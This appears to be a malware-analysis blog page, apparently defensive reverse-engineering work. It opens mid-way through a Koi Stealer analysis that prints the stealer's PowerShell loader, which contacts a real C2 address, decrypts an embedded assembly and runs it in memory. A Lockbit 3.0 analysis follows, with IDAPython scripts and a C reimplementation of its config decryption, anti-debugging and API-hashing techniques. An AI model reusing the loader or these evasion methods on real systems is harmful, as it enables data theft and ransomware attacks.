0x49, 0x48, 0x51, 0x79, 0x61, 0x30, 0x6b, 0x4e, 0x75, 0x44, 0x48, 0x49, 0x38, 0x33, 0x6c, 
[REMOVED BECAUSE IT IS TOO LARGE]

# [Net.ServicePointManager]::SecurityProtocol +='tls12'
$guid = (Get-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Cryptography).MachineGuid
$cfb = (new-object net.webclient).downloadstring("http://79.124.78.109/index.php?id=$guid&subid=zweyWGzf").Split('|')
$k = $cfb[0];

for ($i = 0; $i -lt $bindata.Length ; ++$i)
{
	$bindata[$i] = $bindata[$i] -bxor $k[$i % $k.Length]
}

$bf = [System.Reflection.BindingFlags]::NonPublic -bor [System.Reflection.BindingFlags]::Static
$typee = [System.Type]::GetType("System.Reflection.Assembly")
$mtd = $typee.GetMethod("Load", [Type[]]@([byte[]]))

$sm = $mtd.Invoke($null, @(,$bindata))
$ep = $sm.EntryPoint


$ep.Invoke($null, (, [string[]] ($cfb[1], $cfb[2], $cfb[3])))

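The request to hxxp://79.124.78.109/index.php?id=$guid&subid=zweyWGzf returns a string of fields separated by '|'. The first field is the XOR key used to decrypt the embedded payload, and the next three fields are passed as arguments to the entry point of the decrypted assembly.

Once the .NET executable is decrypted, it is loaded into memory and the execution of Koi Stealer begins.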
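Because the payload is protected with a repeating XOR key, the keystream can often be recovered without contacting the server if the start of the plaintext is known. The sketch below assumes the decrypted assembly begins with the DOS header that common toolchains emit. That is an assumption about the plaintext, not something the server response confirms. It uses only the 46 bytes of $bindata shown above.

```python
from itertools import cycle

# First 46 bytes of $bindata as listed in the script above
BINDATA_PREFIX = bytes([
    0x09, 0x12, 0xd9, 0x38, 0x30, 0x6c, 0x33, 0x6b, 0x31, 0x6c, 0x48, 0x49, 0xb7, 0xae, 0x79, 0x61,
    0x88, 0x6b, 0x4e, 0x75, 0x44, 0x48, 0x49, 0x38, 0x73, 0x6c, 0x33, 0x6b, 0x35, 0x6c, 0x48,
    0x49, 0x48, 0x51, 0x79, 0x61, 0x30, 0x6b, 0x4e, 0x75, 0x44, 0x48, 0x49, 0x38, 0x33, 0x6c,
])

# Assumed plaintext: the first 46 bytes of a typical DOS header
DOS_HEADER_PREFIX = bytes.fromhex(
    "4d5a90000300000004000000ffff0000b8000000" "00000000" "40000000"
) + bytes(18)

def smallest_period(stream: bytes) -> int:
    """Return the shortest period p such that stream[i] == stream[i % p] for all i."""
    for period in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % period] for i in range(len(stream))):
            return period
    return len(stream)

def xor_decrypt(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key, as the PowerShell loop does."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))

keystream = bytes(c ^ p for c, p in zip(BINDATA_PREFIX, DOS_HEADER_PREFIX))
key = keystream[:smallest_period(keystream)]
print(len(key), key)
```

Under this assumption the recovered keystream consists of printable characters and repeats every 20 bytes, which suggests a 20-character key in the first field of the server response.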

Lockbit 3.0 Analysis

Aleks — Sun, 30 Mar 2025 14:46:45 GMT

Overview

This post contains my analysis of various components of Lockbit 3.0. It mainly covers various anti-analysis and anti-debugging capabilities built in, multiple checks conducted before encryption, and how the configuration is stored within the sample. This analysis does not go into depth on the encryption mechanism used in Lockbit 3.0.

Anti-Analysis

Password Prompt

When the password option is enabled for Lockbit, a password string must be passed to -pass in order to decrypt the .text contents of Lockbit.

Lockbit Main Logic Decryption with Password

When the password option is enabled the entry point is directed to the .itext section which contains a function to decrypt the .text and redirect the control flow after it has been decrypted.

API Hashing

When Lockbit is first executed, it resolves an API function call table from a list of API hashes. This table is used throughout the lifetime of the execution.

Within the .text section there are multiple API hash tables. In each table, the first hash always refers to the DLL and is followed by a list of API hashes terminated by 0xCCCCCCCC.

API Hash Table
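The table layout described above can be parsed with a few lines of Python. This is a minimal sketch that assumes the tables are stored back to back as little-endian DWORDs; the function name is hypothetical, and a real table would need to be carved out of the .text section first.

```python
import struct

TABLE_TERMINATOR = 0xCCCCCCCC

def parse_hash_tables(blob: bytes):
    """Split consecutive DWORD tables into (dll_hash, [api_hashes]) tuples."""
    count = len(blob) // 4
    values = struct.unpack(f"<{count}I", blob[:count * 4])
    tables, current = [], []
    for value in values:
        if value == TABLE_TERMINATOR:
            if current:
                # First DWORD names the DLL, the rest are API hashes
                tables.append((current[0], current[1:]))
            current = []
        else:
            current.append(value)
    return tables
```

A trailing table without a terminator is ignored, which keeps partially carved data from producing a misleading entry.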

Lockbit will first invoke multiple functions that loop over each table and resolve each API hash to their corresponding function.

API Hash Table Resolution Functions

The function responsible for populating the function tables loops over each entry in the API hash table and resolves each API hash to a pointer to the corresponding function. It then allocates a buffer on the heap in which a trampoline function is constructed to direct the caller to the resolved function.

Initiation of the API Hash Table resolution routine

After the API hash is resolved and we have a function pointer to the desired function, a trampoline function will be constructed which will be responsible for calling this function.

Trampoline Function Construction

The following shows the construction of a trampoline function. Note that the pointer to the function is always encoded when written to the buffer. This makes it difficult to see what the function points to and complicates fixing the function table when dumping from memory.

Creation of a Trampoline Jump Function

There are five different trampoline functions that can be constructed for any given function; which one is used is decided by a randomly generated number. They all produce the same result and differ only in how they encode the pointer to the function.

EncodedAPIHash = ROR(RESOLVED_API_FUNCTION_PTR, RandomByte)
mov eax, EncodedAPIHash
rol eax, RandomByte
jmp eax

API Hash Trampoline Case 1

EncodedAPIHash = XOR(RESOLVED_API_FUNCTION_PTR, 0x10035FFF)
mov eax, EncodedAPIHash
xor eax, 0x10035FFF
jmp eax

API Hash Trampoline Case 2

EncodedAPIHash = ROL(XOR(RESOLVED_API_FUNCTION_PTR, 0x10035FFF), RandomByte)
mov eax, EncodedAPIHash
ror eax, RandomByte
xor eax, 0x10035FFF
jmp eax

API Hash Trampoline Case 3

EncodedAPIHash = ROR(XOR(RESOLVED_API_FUNCTION_PTR, 0x10035FFF), RandomByte)
mov eax, EncodedAPIHash
rol eax, RandomByte
xor eax, 0x10035FFF
jmp eax

API Hash Trampoline Case 4

EncodedAPIHash = ROL(RESOLVED_API_FUNCTION_PTR, RandomByte)
mov eax, EncodedAPIHash
ror eax, RandomByte
jmp eax

API Hash Trampoline Case 5
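To recover the real function pointers from a dumped trampoline, each encoding can be inverted. The sketch below models the five cases with 32-bit rotate and XOR helpers and pairs each encoder with the decoding that the trampoline performs at run time. The dictionary layout and the sample pointer used to exercise it are assumptions for illustration.

```python
MASK32 = 0xFFFFFFFF
XOR_KEY = 0x10035FFF

def rol(value: int, count: int) -> int:
    """Rotate a 32-bit value left."""
    count &= 31
    return ((value << count) | (value >> (32 - count))) & MASK32

def ror(value: int, count: int) -> int:
    """Rotate a 32-bit value right."""
    count &= 31
    return ((value >> count) | (value << (32 - count))) & MASK32

# How the pointer is encoded when the trampoline is built
ENCODERS = {
    1: lambda ptr, r: ror(ptr, r),
    2: lambda ptr, r: ptr ^ XOR_KEY,
    3: lambda ptr, r: rol(ptr ^ XOR_KEY, r),
    4: lambda ptr, r: ror(ptr ^ XOR_KEY, r),
    5: lambda ptr, r: rol(ptr, r),
}

# What the trampoline does to eax before `jmp eax`
DECODERS = {
    1: lambda enc, r: rol(enc, r),
    2: lambda enc, r: enc ^ XOR_KEY,
    3: lambda enc, r: ror(enc, r) ^ XOR_KEY,
    4: lambda enc, r: rol(enc, r) ^ XOR_KEY,
    5: lambda enc, r: ror(enc, r),
}
```

Given the case number, the immediate from the `mov eax` instruction and the rotate count, `DECODERS[case](encoded, count)` yields the address that the trampoline jumps to.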

In the end there is a table in which each trampoline function is stored. Rather than invoking the resolved API functions directly, Lockbit always calls them through their trampoline functions.

API Function Call Table

Stack Strings

Stack strings are used to encode strings and other data in order to prevent it from being identified through static means. The function responsible for decoding the stack strings will take a pointer to the beginning of the stack string buffer, and the number of encoded DWORD sized entries.

Example of Stack String

Each DWORD in the stack string is decoded by XOR'ing it with a hardcoded value and then inverting all of its bits (bitwise NOT).

Stack String Decoding Routine
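The decoding of a single DWORD can be sketched outside of IDA as follows. It assumes the hardcoded value is 0x10035FFF, as used in the IDAPython script in this post, and that the decoded DWORDs are laid out little-endian in memory. The function names are chosen for this example.

```python
import struct

XOR_KEY = 0x10035FFF

def decode_dword(encoded: int) -> bytes:
    """XOR with the hardcoded key, apply a bitwise NOT, return the little-endian bytes."""
    decoded = ~(encoded ^ XOR_KEY) & 0xFFFFFFFF
    return struct.pack("<I", decoded)

def decode_stack_string(dwords) -> bytes:
    """Decode a sequence of DWORDs, ordered from the lowest stack offset upward."""
    return b"".join(decode_dword(d) for d in dwords)

print(decode_dword(0xEF9BA02D).decode("utf-16-le"))
```

Since an XOR followed by a NOT is the same as a single XOR with the inverted key, the routine is equivalent to XOR'ing each DWORD with 0xEFFCA000.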

The following IDAPython script was used in order to find all stack strings, resolve them, and leave a comment indicating the string.

import idc
import idautils

def flip_bytearray(bytearray_data):

	size = len(bytearray_data)
	flipped = bytearray(size)

	for i, byte in enumerate(bytearray_data):
		flipped[size - 1] = bytearray_data[i]
		size = size - 1
	return flipped


def invert_bytearrays(bytearray_data):
	for i, byte in enumerate(bytearray_data):
		if bytearray_data[i] == 0xFF:
			bytearray_data[i] = 0x00
			continue
		bytearray_data[i] = ~bytearray_data[i] & 0xFF	
	return bytearray_data


def xor_bytearrays(bytearray1, bytearray2):
	if len(bytearray1) != len(bytearray2):
		return

	for i, byte in enumerate(bytearray1):
		bytearray1[i] = bytearray1[i] ^ bytearray2[i]
	return bytearray1

def invert_hex_dword(hex_value):
    # Ensure the input is a 32-bit unsigned integer (DWORD)
    dword = hex_value & 0xFFFFFFFF  # Mask to 32 bits
    inverted = ~dword & 0xFFFFFFFF  # Invert and mask to 32 bits
    return inverted
    

def decode_string(stack_string_encoded):

    xor_key = bytearray.fromhex("10035FFF")
    
    # hex() omits leading zeros, so left-pad to 8 hex digits to always get a 4-byte DWORD
    encoded_string = bytearray.fromhex(stack_string_encoded.replace("0x","").zfill(8))
    
    decoded_string = xor_bytearrays(encoded_string, xor_key)
    decoded_string = invert_bytearrays(decoded_string)
    decoded_string = flip_bytearray(decoded_string)
    return decoded_string

def get_stack_decode_parameters(stack_decode_function_ea):

    '''
    We always pass two parameters to DecodeStackString, which means
    if we go back 0xA bytes we will hit the DWORD array containing stack strings.
    
    Going back 0x3 and taking the 1'th element will give us the size of the stack array.
    
    .text:00416E1C C7 40 08 6C A0 FC EF                    mov     dword ptr [eax+8], 0EFFCA06Ch
    .text:00416E23 6A 03                                   push    3
    .text:00416E25 50                                      push    eax
    .text:00416E26 E8 15 A4 FE FF                          call    DecodeStackString
    '''

    stack_string_array = stack_decode_function_ea - 0xA
    stack_string_array_size = idc.get_bytes(stack_decode_function_ea - 0x3, 0x2, 0)[1]
    
    return (stack_string_array, stack_string_array_size)

def get_list_encoded_string_values(stack_string_array_ea, stack_string_array_size):
    
    # Save initial value
    stack_string_array_inital_ea = stack_string_array_ea
    stack_string_array_inital_ea_next = idc.next_head(stack_string_array_inital_ea, 0xFFFFFFFFFFFFFFFF)
    
    # Move the stack string array ea to before it starts for the loop
    stack_string_array_ea = idc.next_head(stack_string_array_ea, 0xFFFFFFFFFFFFFFFF)
    
    decoded_string_buffer = bytearray(0)
    
    for i in range(0, stack_string_array_size):
        
        # Set the stack string array ea to next stack string
        stack_string_array_ea = idc.prev_head(stack_string_array_ea, 0)
        if idc.print_insn_mnem(stack_string_array_ea) != "mov":
            continue
        
        # Extract the stack string from the assembly line
        # Example: mov dword ptr [eax+4], 0EF9BA02Dh
        stack_string_encoded = idc.get_operand_value(stack_string_array_ea, 1)
        stack_string_encoded = hex(stack_string_encoded & 0x00000000FFFFFFFF)
        decoded_string = decode_string(stack_string_encoded)
        decoded_string_buffer = decoded_string + decoded_string_buffer

    print("[+] Decoded Bytes: " + decoded_string_buffer.hex())
    try:
        print("[+] Decoded String: " + decoded_string_buffer.decode('utf-16'))
        
        idc.set_cmt(stack_string_array_inital_ea, decoded_string_buffer.decode('utf-16'), 0);
        idc.set_cmt(stack_string_array_inital_ea_next, decoded_string_buffer.hex(), 0);
    except UnicodeDecodeError:
        idc.set_cmt(stack_string_array_inital_ea_next, decoded_string_buffer.hex(), 0);
    
for xref in idautils.XrefsTo(stack_decoding_string_function_ea):
    print(f"[*] Decode Function @ {hex(xref.frm)}")
    stack_decode_func = xref.frm
    (stack_string_array, stack_string_array_size) = get_stack_decode_parameters(stack_decode_func)

    get_list_encoded_string_values(stack_string_array,stack_string_array_size)

The majority of the decoded stack strings resolve to data that can be interpreted as Unicode strings.

However, there is data that is not human readable encoded using this mechanism. For example, the following is the riid parameter for the CoCreateInstance function.

Anti-Debugging

Heap Corruption

A wrapper function is used to invoke RtlAllocateHeap. Before the call to this function, the handle to the heap is acquired via the PEB and Heap->ForceFlags is checked for a value other than 0, which indicates the presence of a debugger.

If a debugger is detected, the pointer to the heap is corrupted and RtlAllocateHeap will likely crash the process as a result.

Heap Based Anti-Debug Technique - RtlCreateHea

There are a lot of anti debug techniques. Some of them are basics and some of them are advanced. Now, I explain a little bit hard one…

Medium, Bilal Bakartepe

"Anti-Debugging Techniques Found in Lockbit 3.0 (Part 1)"

Introduction (feel free to skip): I am currently analyzing Lockbit 3.0, a ransomware seen in use in 2022. Lockbit 3.0 is, with the story of its builder being leaked…

Ameba, Sachiel

Detaching from Debugger

ZwSetInformationThread is called with the ThreadHideFromDebugger parameter when the process begins running, and on newly spawned encryption threads. This "enables suppression of debug events generated on the thread. Threads that do not generate debug events are essentially invisible to debuggers."

Detaching from Debugger

Preventing Debugger from Attaching

Early in execution, DbgUiRemoteBreakin is corrupted by setting the protection of the first few bytes of the function to Read/Write and using SystemFunction040 to encrypt the contents. As a result, a debugger will not be able to attach itself to the process.

Corruption of DbgUiRemoteBreakin

Lockbit Configuration Decryption

One of the first steps taken by Lockbit is to decode its embedded configuration file.

Helper Function Decoding

There are multiple steps taken by Lockbit to decode the embedded configuration file. The first phase is to extract helper functions that are encrypted and compressed within the .data section. These helper functions take the form of assembly instructions that facilitate the generation of the XOR keys used to decrypt the configuration.

Note that the size of the helper function buffer is stored in the DWORD right before it starts; in this case it is 0x1AE bytes in size.

Encrypted and Compressed Helper Functions

In order to decrypt the helper function buffer each byte is XOR'd with a hardcoded key of 0x30. After the entire buffer is decrypted APLib is used to decompress the contents.
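As a rough standalone illustration of the first half of this step, the sketch below reads the size DWORD that precedes the buffer and XORs each byte with 0x30. The function name `decrypt_helper_blob`, the `buffer_offset` parameter, and the little-endian interpretation of the size are assumptions made for illustration; the aPLib decompression that follows is not shown.

```python
import struct

def decrypt_helper_blob(data, buffer_offset, key=0x30):
    """XOR-decrypt a size-prefixed buffer (hypothetical helper, not the sample's code).

    data          -- raw bytes containing the buffer (for example a dumped .data section)
    buffer_offset -- offset of the first encrypted byte; the size DWORD sits 4 bytes before it
    key           -- single-byte XOR key (0x30 as described in the post)
    """
    # Assumption: the size DWORD is little-endian, as is usual on x86
    (size,) = struct.unpack_from("<I", data, buffer_offset - 4)
    encrypted = data[buffer_offset:buffer_offset + size]
    return bytes(b ^ key for b in encrypted)
```

The returned bytes would still need to be passed through an aPLib decompressor before they resemble assembly code.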

The most important point is that the helper function buffer has been decrypted and decompressed into a newly allocated buffer on the heap. Since the contents of this buffer are executable assembly code, Lockbit is able to execute it when invoked.

In the end, a trampoline function is created in order to invoke the assembly code. This is the exact same process as used for functions resolved via API hashing.

Decoding Helper Function and Trampoline Function Construction

The helper function that has been decoded in this phase will be used in the process of decoding the core configuration.

The following script was used in IDA in order to decrypt and decompress the helper functions. A new segment was created in IDA in order to write the assembly code to.

import struct
from binascii import crc32
from io import BytesIO
import idc
import idautils

# APLib Code Found on https://github.com/snemes/aplib
class APLib(object):

    __slots__ = 'source', 'destination', 'tag', 'bitcount', 'strict'

    def __init__(self, source, strict=True):
        self.source = BytesIO(source)
        self.destination = bytearray()
        self.tag = 0
        self.bitcount = 0
        self.strict = bool(strict)

    def getbit(self):
        # check if tag is empty
        self.bitcount -= 1
        if self.bitcount < 0:
            # load next tag
            self.tag = ord(self.source.read(1))
            self.bitcount = 7

        # shift bit out of tag
        bit = self.tag >> 7 & 1
        self.tag <<= 1

        return bit

    def getgamma(self):
        result = 1

        # input gamma2-encoded bits
        while True:
            result = (result << 1) + self.getbit()
            if not self.getbit():
                break

        return result

    def depack(self):
        r0 = -1
        lwm = 0
        done = False

        try:

            # first byte verbatim
            self.destination += self.source.read(1)

            # main decompression loop
            while not done:
                if self.getbit():
                    if self.getbit():
                        if self.getbit():
                            offs = 0
                            for _ in range(4):
                                offs = (offs << 1) + self.getbit()

                            if offs:
                                self.destination.append(self.destination[-offs])
                            else:
                                self.destination.append(0)

                            lwm = 0
                        else:
                            offs = ord(self.source.read(1))
                            length = 2 + (offs & 1)
                            offs >>= 1

                            if offs:
                                for _ in range(length):
                                    self.destination.append(self.destination[-offs])
                            else:
                                done = True

                            r0 = offs
                            lwm = 1
                    else:
                        offs = self.getgamma()

                        if lwm == 0 and offs == 2:
                            offs = r0
                            length = self.getgamma()

                            for _ in range(length):
                                self.destination.append(self.destination[-offs])
                        else:
                            if lwm == 0:
                                offs -= 3
                            else:
                                offs -= 2

                            offs <<= 8
                            offs += ord(self.source.read(1))
                            length = self.getgamma()

                            if offs >= 32000:
                                length += 1
                            if offs >= 1280:
                                length += 1
                            if offs < 128:
                                length += 2

                            for _ in range(length):
                                self.destination.append(self.destination[-offs])

                            r0 = offs

                        lwm = 1
                else:
                    self.destination += self.source.read(1)
                    lwm = 0

        except (TypeError, IndexError):
            if self.strict:
                raise RuntimeError('aPLib decompression error')

        return bytes(self.destination)

    def pack(self):
        raise NotImplementedError


# APLib Code Found on https://github.com/snemes/aplib
def decompress(data, strict=False):
    packed_size = None
    packed_crc = None
    orig_size = None
    orig_crc = None

    if data.startswith(b'AP32') and len(data) >= 24:
        # data has an aPLib header
        header_size, packed_size, packed_crc, orig_size, orig_crc = struct.unpack_from('=IIIII', data, 4)
        data = data[header_size : header_size + packed_size]

    if strict:
        if packed_size is not None and packed_size != len(data):
            raise RuntimeError('Packed data size is incorrect')
        if packed_crc is not None and packed_crc != crc32(data):
            raise RuntimeError('Packed data checksum is incorrect')

    result = APLib(data, strict=strict).depack()

    if strict:
        if orig_size is not None and orig_size != len(result):
            raise RuntimeError('Unpacked data size is incorrect')
        if orig_crc is not None and orig_crc != crc32(result):
            raise RuntimeError('Unpacked data checksum is incorrect')

    return result


original_config_offset = 0x00F04DBF # Offset to the encrypted and compressed helper functions
current_config_offset = original_config_offset

size = idc.get_wide_dword(original_config_offset - 4) # Size DWORD is stored right before the buffer
print(hex(size))

# Decrypt Helper Functions with XOR

for _ in range(size):
    current_byte = idc.get_bytes(current_config_offset, 1)
    current_byte = int.from_bytes(current_byte, "little") # byteorder argument is required before Python 3.11
    current_byte = current_byte ^ 0x30
    
    idc.patch_byte(current_config_offset, current_byte)
    
    current_config_offset = current_config_offset + 1

# Decompress Helper Functions and Write to New Segment

decoded_bytes = idc.get_bytes(original_config_offset, size)
decompressed_bytes = decompress(decoded_bytes)
new_segment = 0x0F190000 # New segment to write code to, this will store decrypted and decompressed assembly code

for index, byte in enumerate(decompressed_bytes):
    idc.patch_byte(new_segment + index, byte)

IDAPython Script to Decode Helper Functions

Configuration Decoding

The configuration is stored in the .pdata section, the following summarizes the components of the configuration:

.pdata+0x0: First DWORD used to generate initial XOR key.
.pdata+0x4: Second DWORD used to generate initial XOR key.
.pdata+0x8: Size of configuration contents.
.pdata+0xC: Encrypted and compressed configuration contents.

Core Lockbit Configuration in .pdata

The DeriveXORKey function in this case is a call to the helper function that was decoded in the previous step. Once called, it returns values in eax and edx that are used to decrypt the configuration. Note that DeriveXORKey depends only on the first two DWORDs (8 bytes) of the configuration, so the key stream it produces for a given configuration is deterministic.

The core of the decryption process is the derivation of XOR keys within the DeriveXORKey function. Once DeriveXORKey derives a key, it is returned as two separate values, in this case in the EAX and EDX registers.

Derive XOR Values for Config Decryption

As a reminder, the DeriveXORKey is the helper function that was decrypted in the prior step. Without the prior step there would be no way to generate the XOR keys required to decrypt the core configuration.

DeriveXORKey Trampoline Jump

The Lockbit configuration is then decrypted two DWORDs at a time using both of these XOR keys. Each byte of a DWORD is XOR'd with a specific byte taken from the two key values.

This decryption scheme ensures that each byte is encrypted with a separate XOR key. In addition, it adds a level of complexity for the analyst to be able to determine the final algorithm and reimplement it.

To make the decryption algorithm as clear as possible, the following code written in C emulates the process:

#include <windows.h>
#include <string.h>
#include "LockbitConfig.h"
#include "aplib.h"


DWORD32 MultiplyAndGetHigh(DWORD32 a, DWORD32 b) {
    // Perform the multiplication, which results in a 64-bit result
    DWORD64 result = (DWORD64)a * (DWORD64)b;

    // Extract the higher 32 bits by shifting right
    return (DWORD32)((result >> 32) & 0xFFFFFFFF); // Right shift by 32 bits
}

VOID ComputeNumbers(_In_ DWORD32 Arg1, _In_ DWORD32 Arg2, _In_ DWORD32 Arg3, _In_ DWORD32 Arg4, _Out_ PDWORD32 XORKey1, _Out_ PDWORD32 XORKey2) {

    *XORKey1 = Arg1 * Arg3;
    *XORKey2 = MultiplyAndGetHigh(Arg1, Arg3) + ((Arg3 * Arg2) + (Arg1 * Arg4));
}

// Value1 will first be pointer to first dword of config
// Value2 will first be pointer to second dword of config
void DeriveXORKey(_In_ PDWORD32 InputValue1, _In_ PDWORD32 InputValue2, _Out_ PDWORD32 XORKey1, _Out_ PDWORD32 XORKey2) {

    /*
        Compute the first round of XOR Keys
    */

    DWORD Output1 = 0;
    DWORD Output2 = 0;
    ComputeNumbers(*InputValue1, *InputValue2, 0x4C957F2D, 0x5851F42D, &Output1, &Output2);

    /*
        Conduct permutations on the first round of XOR keys
    */

    DWORD32 permutedArg3 = Output1 + 0x0F767814F;
    DWORD32 carry = 0;
    if (permutedArg3 < Output1 || permutedArg3 < 0x0F767814F) {
        carry = 1;
    }

    // If previous add had carry flag set, add it to this calculation
    DWORD32 permutedArg4 = Output2 + 0x14057B7E + carry;

    /*
        Updated values used for follow up DeriveXORKey calls
    */

    *InputValue1 = permutedArg3;
    *InputValue2 = permutedArg4;

    /*
        Compute second round of XOR keys and return
    */

    ComputeNumbers(((PDWORD)global_LockbitConfig)[0], ((PDWORD)global_LockbitConfig)[1], permutedArg3, permutedArg4, &Output1, &Output2);

    *XORKey1 = Output1;
    *XORKey2 = Output2;
}

VOID DecodePayload(PBYTE pConfig, SIZE_T size) {


    /*
      These two values are initially set to the first and second DWORD from the Lockbit Config

      After each DeriveXORKey execution they get updated with a permuted value, and are
      passed to the following DeriveXORKey call.
  */

    DWORD32 value1 = ((PDWORD)global_LockbitConfig)[0];
    DWORD32 value2 = ((PDWORD)global_LockbitConfig)[1];

    /*
        The xorKey DWORD variables will receive XOR Keys from DeriveXORKey.
    */
    DWORD32 xorKey1 = 0;
    DWORD32 xorKey2 = 0;

    SIZE_T DwordsToDecrypt = 2;

    PBYTE pCurrentConfigOffset = pConfig;
    SIZE_T configSizeCounter = size;

    /*
        Decode the config, the lower 16 bits will be used to decode one DWORD of the config.
        Then the higher 16 bits will be used to decode another DWORD of the config.

    */

    while (TRUE) {

        DeriveXORKey(&value1, &value2, &xorKey1, &xorKey2);

        for (SIZE_T j = 0; j < 2; j++) {

            // XOR with LOWER_8_BITS(xorKey1) - AL of EAX

            *pCurrentConfigOffset = *pCurrentConfigOffset ^ (xorKey1 & 0x000000FF);
            pCurrentConfigOffset++;

            configSizeCounter--;
            if (configSizeCounter == 0) {
                goto END;
            }

            // XOR with HIGHER_8_BITS(xorKey2) - DH of EDX

            *pCurrentConfigOffset = *pCurrentConfigOffset ^ ((xorKey2 >> 8) & 0x000000FF);
            pCurrentConfigOffset++;

            configSizeCounter--;
            if (configSizeCounter == 0) {
                goto END;
            }

            // XOR with HIGHER_8_BITS(xorKey1) - AH of EAX

            *pCurrentConfigOffset = *pCurrentConfigOffset ^ ((xorKey1 >> 8) & 0x000000FF);
            pCurrentConfigOffset++;

            configSizeCounter--;
            if (configSizeCounter == 0) {
                goto END;
            }

            // XOR with LOWER_8_BITS(xorKey2) - DL of EDX

            *pCurrentConfigOffset = *pCurrentConfigOffset ^ (xorKey2 & 0x000000FF);
            pCurrentConfigOffset++;

            configSizeCounter--;
            if (configSizeCounter == 0) {
                goto END;
            }

            // Shift bits right by 0x10
            // This ensures we now use the higher 16 bits for the next loop around
            xorKey1 = xorKey1 >> 0x10;
            xorKey2 = xorKey2 >> 0x10;
        }
    }
END:
    return;
}


int main()
{
    
    /*
        Allocate new heap space for the decoded config
    */

    SIZE_T configSize = ((PDWORD)global_LockbitConfig)[2];

    PBYTE pLockbitConfig = (PBYTE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, configSize);
    if (pLockbitConfig == NULL) {
        return -1;
    }

    memcpy(pLockbitConfig, global_LockbitConfig + 0xC, configSize); // Encoded config starts at global_LockbitConfig + 0xC

    /*
        Decrypt the config
    */

    DecodePayload(pLockbitConfig, configSize);

    /*
        Decompress Config with APLib
    */

    PBYTE pDecompressedConfig = (PBYTE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, configSize * 4);
    if (pDecompressedConfig == NULL) {
        return -1;
    }

    aP_depack_asm(pLockbitConfig, pDecompressedConfig);
    
    return 0;

}

C Implementation of Lockbit 3.0 Configuration Decoding
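For readers who prefer Python, the C routine above can be condensed by treating each pair of DWORDs as a single 64-bit integer. This is a sketch derived only from the C listing, not from the sample itself: the two `ComputeNumbers` calls become 64-bit multiplications, and the add-with-carry step becomes a 64-bit addition. The names `derive_xor_key` and `decode_payload` are illustrative, and the aPLib decompression step is not included.

```python
import struct

MASK64 = (1 << 64) - 1
# The two 32-bit halves used in the C code, joined into 64-bit constants
LCG_MULTIPLIER = 0x5851F42D4C957F2D  # (0x5851F42D << 32) | 0x4C957F2D
LCG_INCREMENT = 0x14057B7EF767814F   # (0x14057B7E << 32) | 0xF767814F

def derive_xor_key(state, seed):
    """Advance the 64-bit state, then return (new_state, key_low, key_high)."""
    state = (state * LCG_MULTIPLIER + LCG_INCREMENT) & MASK64
    key = (seed * state) & MASK64
    return state, key & 0xFFFFFFFF, key >> 32

def decode_payload(blob):
    """Decrypt a blob laid out as: 8-byte seed, 4-byte size, encrypted data."""
    seed, size = struct.unpack_from("<QI", blob, 0)
    data = bytearray(blob[0xC:0xC + size])
    state = seed
    pos = 0
    while pos < len(data):
        state, key1, key2 = derive_xor_key(state, seed)
        for _ in range(2):  # low 16 bits first, then high 16 bits
            # Byte order mirrors the C code: AL, DH, AH, DL
            for key_byte in (key1 & 0xFF, (key2 >> 8) & 0xFF,
                             (key1 >> 8) & 0xFF, key2 & 0xFF):
                if pos == len(data):
                    return bytes(data)
                data[pos] ^= key_byte
                pos += 1
            key1 >>= 16
            key2 >>= 16
    return bytes(data)
```

Because the scheme is a plain XOR stream keyed only by the first eight bytes, running `decode_payload` on its own output (with the same 12-byte header prepended) returns the original data.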

Configuration Parsing

Once the configuration is decrypted and decompressed various parts of the buffer are interpreted and associated with its corresponding data that is stored.

Decrypted Lockbit Configuration

Red: 1024-bit RSA Key
Orange: UID and KeyID
Purple: Boolean values indicating to enable or disable functionality
Green: Base64 encoded configurations separated by NULL terminators.

The following summarizes what is included within the Base64 encoded configuration sections:

Folder Exclusion List: List of folders to be excluded stored as a string hash.

Filename Exclusion List: List of filenames to be excluded stored as a string hash.

File Extension Exclusion List: File extensions to be exclude stored as a string hash.

Computer Hostname Exclusion List: Computer hostnames to exclude stored in plaintext.

Process Termination List: List of process names to terminate stored in plaintext.

Service Termination List: List of services to terminate stored in plaintext.

User Account Impersonation List: List of accounts used to run the ransomware under.

Ransom Note: The ransom note.

Pre-Encryption Checks and Anti-Forensics

Language Check

Language checks are conducted if the LanguageCheck flag in the configuration is enabled. The check is performed with the NtQueryDefaultUILanguage function.

Language Check

The full list of languages checked is below:

Language
Russian
Ukrainian
Belarusian
Tajik
Armenian
Azerbaijani
Georgian
Kazakh
Kyrgyz
Turkmen
Uzbek
Tatar
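To make the check concrete, the sketch below maps a Windows LANGID to the languages in the list above. The post does not give the numeric identifiers the sample compares against, so the table uses the standard Windows primary language identifiers, and matching on the primary language (the low 10 bits of the LANGID) is an assumption rather than the sample's confirmed logic. The function names are illustrative.

```python
# Standard Windows primary language identifiers (assumed, not taken from the sample)
EXCLUDED_PRIMARY_LANGUAGES = {
    0x19: "Russian",
    0x22: "Ukrainian",
    0x23: "Belarusian",
    0x28: "Tajik",
    0x2B: "Armenian",
    0x2C: "Azerbaijani",
    0x37: "Georgian",
    0x3F: "Kazakh",
    0x40: "Kyrgyz",
    0x42: "Turkmen",
    0x43: "Uzbek",
    0x44: "Tatar",
}

def primary_language_id(langid):
    """Equivalent of the PRIMARYLANGID macro: keep the low 10 bits."""
    return langid & 0x3FF

def is_excluded_language(langid):
    """Return True if the LANGID belongs to one of the listed languages."""
    return primary_language_id(langid) in EXCLUDED_PRIMARY_LANGUAGES
```

For example, `is_excluded_language(0x0419)` (Russian) is true, while `is_excluded_language(0x0409)` (US English) is false.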

Process Deletion

During execution Lockbit will start a function as a thread responsible for terminating blacklisted processes.

Process Termination Capability

This function uses NtQuerySystemInformation to enumerate each process and compares it to a predefined list of processes. If there is a match, a handle is opened to the process and it is terminated.

Process Termination Logic

Service Deletion

If the terminate service flag is set, Lockbit will terminate a predefined list of services. First it will construct a list of services that are present on the system via EnumServicesStatusExW.

Service Enumeration

After that, it will loop through each service and compare it to a predefined list. If there is a match, that service will be stopped and deleted.

Service Termination

Clearing Event Logs

Event Log Clearing Capability

Clear Event Log Logic

Creating a Mutex

A Mutex name will be generated based on the RSA key embedded in the Lockbit configuration.

Mutex Creation

